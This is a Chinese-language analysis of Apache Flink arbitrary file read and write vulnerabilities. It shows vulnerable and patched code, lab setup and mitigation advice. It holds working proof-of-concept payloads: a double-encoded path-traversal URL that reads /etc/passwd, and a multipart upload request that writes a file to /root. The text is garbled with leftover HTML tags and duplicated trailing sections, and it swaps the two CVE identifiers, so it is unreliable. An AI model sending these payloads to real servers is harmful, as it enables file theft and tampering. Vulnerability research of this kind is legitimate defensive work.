Apache Flink 任意文件读取和写入漏洞分析<\/h1>

一、漏洞概述<\/h2>

Apache Flink 存在两个高危漏洞：<\/p>

CVE-2020-17518 - 任意文件读取漏洞<\/li>

CVE-2020-17519 - 任意文件写入漏洞<\/li> <\/ol>

这两个漏洞都存在于Flink的Web界面中，攻击者可以通过构造特殊请求实现对服务器文件系统的非法访问。<\/p>

二、漏洞分析<\/h2>

1. 任意文件读取漏洞 (CVE-2020-17518)<\/h3>

漏洞位置<\/strong>：JobManagerCustomLogHandler<\/code>类<\/p>

漏洞原因<\/strong>：<\/p>

处理日志文件请求时，直接从请求路径参数获取文件名<\/li> 未对文件名进行规范化处理，导致目录遍历攻击可能<\/li> <\/ul> 关键代码对比<\/strong>：<\/p> \/\/ 漏洞代码 <\/span><\/span><\/span><\/span>String filename =<\/span> handlerRequest.<\/span>getPathParameter<\/span>(<\/span>LogFileNamePathParameter.<\/span>class<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 修复代码 <\/span><\/span><\/span><\/span>String filename =<\/span> new<\/span> File(<\/span>handlerRequest.<\/span>getPathParameter<\/span>(<\/span>LogFileNamePathParameter.<\/span>class<\/span>)).<\/span>getName<\/span>();<\/span> <\/span><\/span><\/code><\/pre>攻击方式<\/strong>：通过构造包含..\/<\/code>的路径，可以读取服务器上的任意文件<\/p> 利用POC<\/strong>：<\/p> http:\/\/target:8081\/v1\/jobmanager\/logs\/..%252f..%252f..%252f..%252fetc%252fpasswd http:\/\/target:8081\/jobmanager\/logs\/..%252f..%252f..%252f..%252fetc%252fpasswd <\/code><\/pre> 2. 任意文件写入漏洞 (CVE-2020-17519)<\/h3> 漏洞位置<\/strong>：FileUploadHandler<\/code>类<\/p> 漏洞原因<\/strong>：<\/p> 文件上传处理逻辑中，直接使用用户提供的文件名<\/li> 未对目标路径进行限制，导致可以写入任意位置<\/li> <\/ul> 关键代码<\/strong>：<\/p> DiskFileUpload fileUpload =<\/span> (<\/span>DiskFileUpload)<\/span>data;<\/span> <\/span><\/span>Preconditions.<\/span>checkState<\/span>(<\/span>fileUpload.<\/span>isCompleted<\/span>());<\/span> <\/span><\/span>Path dest =<\/span> this<\/span>.<\/span>currentUploadDir<\/span>.<\/span>resolve<\/span>(<\/span>fileUpload.<\/span>getFilename<\/span>());<\/span> <\/span><\/span>fileUpload.<\/span>renameTo<\/span>(<\/span>dest.<\/span>toFile<\/span>());<\/span> <\/span><\/span><\/code><\/pre>攻击方式<\/strong>：通过构造包含路径的文件名，可以将上传的文件移动到服务器上的任意位置<\/p> 利用POC<\/strong>：<\/p> POST<\/span> \/test HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target:8081<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryw6W3L7dPchtqPO4f<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundaryw6W3L7dPchtqPO4f <\/span><\/span>Content-Disposition: form-data; name="xxxx"; filename="\/root\/test123" <\/span><\/span>Content-Type: application\/octet-stream <\/span><\/span> <\/span><\/span>test123 <\/span><\/span>------WebKitFormBoundaryw6W3L7dPchtqPO4f-- <\/span><\/span><\/code><\/pre>三、环境搭建与调试<\/h2> 1. 环境准备<\/h3> 下载Apache Flink安装包<\/li> 修改配置文件conf\/flink-conf.yaml<\/code>，添加调试参数： env.java.opts.jobmanager: "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8006" <\/code><\/pre> <\/li> 使用IntelliJ IDEA配置远程调试<\/li> <\/ol> 2. 路由信息获取<\/h3> 访问Flink Web UI (http:\/\/ip:8081)<\/li> 通过触发错误获取路由信息（如上传非jar文件）<\/li> 在org.apache.flink.runtime.webmonitor.handlers.JarUploadHandler<\/code>设置断点<\/li> <\/ol> 四、漏洞验证<\/h2> 1. 任意文件读取验证<\/h3> 构造包含路径遍历的URL<\/li> 观察是否能够读取到目标文件内容<\/li> <\/ol> 2. 任意文件写入验证<\/h3> 构造包含绝对路径的文件上传请求<\/li> 检查目标路径是否创建了指定文件<\/li> <\/ol> 五、修复建议<\/h2> 升级到已修复版本<\/li> 临时缓解措施：限制对Flink Web界面的访问<\/li> 使用Web应用防火墙(WAF)拦截恶意请求<\/li> <\/ul> <\/li> <\/ol> 六、参考链接<\/h2> Apache Flink官方公告1<\/a><\/li> Apache Flink官方公告2<\/a><\/li> <\/ol>

Apache Flink 任意文件读取和写入漏洞分析<\/h1>

二、漏洞分析<\/h2>

三、环境搭建与调试<\/h2>

四、漏洞验证<\/h2>

五、修复建议<\/h2> 升级到已修复版本<\/li> 临时缓解措施： 限制对Flink Web界面的访问<\/li> 使用Web应用防火墙(WAF)拦截恶意请求<\/li> <\/ul> <\/li> <\/ol> 六、参考链接<\/h2> Apache Flink官方公告1<\/a><\/li> Apache Flink官方公告2<\/a><\/li> <\/ol>

六、参考链接<\/h2> Apache Flink官方公告1<\/a><\/li> Apache Flink官方公告2<\/a><\/li> <\/ol>

六、参考链接<\/h2>

Apache Flink官方公告1<\/a><\/li>
Apache Flink官方公告2<\/a><\/li> <\/ol>